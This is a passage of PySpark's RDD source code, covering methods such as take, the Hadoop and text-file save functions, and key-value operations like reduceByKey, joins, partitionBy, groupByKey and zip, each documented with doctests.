to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
The default partitioner is a hash partitioner.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as the default because the builtin hash of None differs
# across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
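            # `c` counts records buffered since the last flush; `batch` is the adaptive flush
            # threshold, tuned below to keep serialized chunks roughly between 1 MB and 10 MB.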
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
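        # Map-side combine first: merge values within each input partition (ExternalMerger
        # spills to disk if the worker memory budget is exceeded), then shuffle the partial
        # combiners and merge them per output partition.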
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
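        # ExternalGroupBy can spill groups to disk, so a single very large group does not
        # exhaust worker memory.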
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
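# As noted above, coalesce without a shuffle is the cheaper way to reduce the
# partition count; repartition(n) is simply coalesce(n, shuffle=True). A small
# sketch of the difference:
#
#   >>> rdd = sc.parallelize(range(8), 4)
#   >>> rdd.coalesce(2).getNumPartitions()     # merges partitions, no shuffle
#   2
#   >>> rdd.coalesce(8).getNumPartitions()     # cannot grow without a shuffle
#   4
#   >>> rdd.repartition(8).getNumPartitions()  # shuffles, so it can grow
#   8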
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute the elements evenly across the
# output partitions. Otherwise, repartition may produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs made of the
first elements of each RDD, the second elements of each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# The JVM will raise an exception if the partitions do not contain the
# same number of items.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a Spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
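# Worked example of the id scheme above: with n = 3 partitions, the k-th
# partition hands out ids k, n+k, 2*n+k, ... For the doctest the elements land
# as ["a"], ["b", "c"], ["d", "e"], giving:
#   partition 0: "a" -> 0
#   partition 1: "b" -> 1, "c" -> 4  (1, 3+1)
#   partition 2: "d" -> 2, "e" -> 5  (2, 3+2)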
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
